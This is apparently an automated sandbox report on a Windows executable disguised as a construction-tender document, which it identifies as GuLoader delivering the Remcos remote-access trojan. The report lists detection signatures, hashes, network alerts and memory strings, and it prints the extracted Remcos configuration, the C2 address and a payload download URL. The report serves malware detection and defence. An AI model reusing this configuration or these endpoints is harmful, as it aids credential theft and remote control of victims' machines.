Windows Analysis Report
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

Overview

General Information

Sample name: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
Analysis ID: 1576192
MD5: 92e917f439cc408828a0629d80fdb043
SHA1: ffcf08807371521fb40a31aff774e3275cd4338d
SHA256: 6959fb446ee0634e6622e50f0f1b9367bffddf12f8083507cdc0ff39ed50abf4
Tags: exe, user-lowmal3
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7504 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |

              Stealing of Sensitive Information

              Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, ProcessId: 7864, TargetFilename: C:\ProgramData\remcos\logs.dat

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-16T16:18:50.616214+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 162.251.122.87 | 2404 | TCP
              2024-12-16T16:18:52.803573+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 162.251.122.87 | 2404 | TCP
              2024-12-16T16:18:53.084850+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 178.237.33.50 | 80 | TCP
              2024-12-16T16:18:45.335302+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 66.63.187.30 | 80 | TCP

              AV Detection

              Source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | ReversingLabs: Detection: 21%
              Source: Yara match | File source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 4_2_00402770 FindFirstFileW,4_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 4_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 4_2_004062CF FindFirstFileW,FindClose,4_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 4_2_332B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_332B10F1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | Code function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 162.251.122.87:2404
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 162.251.122.87:2404
              Source: Malware configuration extractor | IPs: 162.251.122.87
              Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 162.251.122.87:2404
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 178.237.33.50
              Source: Joe Sandbox View | ASN Name: UNREAL-SERVERSUS
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 178.237.33.50:80
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 66.63.187.30:80
              Source: global traffic | HTTP traffic detected: GET /wBWcspgeBmkxYD199.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: 66.63.187.30; Cache-Control: no-cache
              Source: unknown | TCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: bhv4333.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhv4333.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944475121.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/wBWcspgeBmkxYD199.bin
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/wBWcspgeBmkxYD199.bin_(
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp;n-
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpG
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhv4333.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221230831.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://www.skinstudio.netG
              Source: bhv4333.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhv4333.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhv4333.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhv4333.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhv4333.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhv4333.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhv4333.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhv4333.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhv4333.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv4333.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv4333.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhv4333.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv4333.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhv4333.tmp.5.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv4333.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
